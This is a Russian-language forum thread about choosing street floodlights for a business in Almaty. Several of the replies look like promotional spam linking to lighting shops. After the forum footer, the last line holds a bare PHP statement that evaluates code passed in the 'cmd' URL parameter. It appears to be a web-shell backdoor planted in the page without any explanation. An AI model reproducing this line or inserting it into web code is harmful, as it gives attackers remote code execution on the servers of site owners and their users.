+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Уличное освещение


  1. #1
    Мимо проходил restav is on a distinguished road Аватар для restav
    Регистрация
    13.02.2019
    Сообщений
    38

    Уличное освещение

    Мне нужно облагородить территорию возле моей фирмы, которая находится в Алматы. В первую очередь хочу сделать нормальное освещение, деревья посадить и т.п. Встал вопрос по поводу выбора ламп, может Вы посоветуете хорошие и недорогие прожекторы?

  2. #2
    Мимо проходил persh is on a distinguished road Аватар для persh
    Регистрация
    25.02.2019
    Сообщений
    37
    Я думаю, что Вам идеально подойдут консольные светильники Пегас, стоят они примерно 9000 тенге за штуку. Данные светильники идут с разной степенью защиты оптического отсека, но я советую брать модели с IP 53, они очень надежные.

  3. #3
    Мимо проходил everd is on a distinguished road Аватар для everd
    Регистрация
    24.01.2019
    Сообщений
    37
    Выбирать прожекторы нужно исходя из площади, которую Вам необходимо осветить. Лучше будет установить несколько мощных прожекторов, так выйдет дешевле да и сама территория будет очень хорошо освещена.

  4. #4
    Мимо проходил aint is on a distinguished road Аватар для aint
    Регистрация
    08.03.2019
    Сообщений
    37
    Для уличного освещения действительно нужны довольно мощные прожекторы, но многое также зависит от места их установки. Они должны светить под нужным углом и находится на соответствующей высоте, дабы свет нормально распределялся по освещаемой территории. К слову говоря, купить прожекторы в Алматы не такая уж и проблема: https://ekt.kz/catalog/pod-rtutnuyu-...-rku-konsolnye

  5. #5
    GTI-Racing bergamo is on a distinguished road Аватар для bergamo
    Регистрация
    05.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    685
    Здравствуйте, где лучше всего купить хорошую люстру для дома? Посоветуйте

  6. #6
    GTI-Racing Astra is on a distinguished road Аватар для Astra
    Регистрация
    05.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    725
    Привет, если вам нужна хорошая люстра, то рекомендую заглянуть в каталог https://www.mnogotochiesveta.ru ,отличный интернет-магазин, мне он нравится ,качество товара просто изумительное, а выбор большой.

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Сейчас такая конкуренция что приходится обращать внимание буквально на все. А на освещении вообще экономить нельзя, при неправильном подходе можно запросто потерять клиентов. Я например считаю что в первую очередь нужно хорошо освещать товар, так что пусть этим занимаются специалисты https://my-light.ru/ проверенные, а не кто-то там разрекламированный хорошо, потому что доверять в первую очередь нужно опыту близких знакомых\коллег и тд

+ Ответить в теме

Похожие темы

  1. Ответов: 2
    Последнее сообщение: 01.04.2024, 19:59

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}